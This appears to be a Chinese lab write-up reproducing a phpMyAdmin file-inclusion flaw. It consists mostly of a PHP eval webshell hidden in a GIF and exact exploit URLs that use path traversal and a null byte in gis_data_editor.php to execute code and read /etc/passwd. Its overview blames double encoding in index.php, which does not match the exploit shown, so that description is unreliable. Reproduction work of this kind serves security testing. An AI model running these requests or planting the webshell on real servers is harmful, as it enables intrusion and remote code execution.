一、漏洞概述
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。根目录下1.gif,其内容为:<?php@eval($_POST[a]);?> ,测试账号密码:pmatest/pmatest。
二、影响范围
4.0.x 4.0.10.6以下
4.1.x 4.1.14.7以下
4.2.x 4.2.12以下
三、访问页面
四、漏洞复现
1、登录,测试账号密码:pmatest/pmatest,拿到token。
2、访问地址,burp抓包修改请示方式为POST,请求参数为a=phpinfo(); ,请求类型为Content-Type:application/x-www-form-urlencoded
/pma/gis_data_editor.php?token=61e17a5bb0ccde8ab9a768d4c7f68802&&gis_data[gis_type]=/../../../../1.gif%00
3、目录穿越
/pma/gis_data_editor.php?token=61e17a5bb0ccde8ab9a768d4c7f68802&&gis_data[gis_type]=../../../../../../../../../etc/passwd%00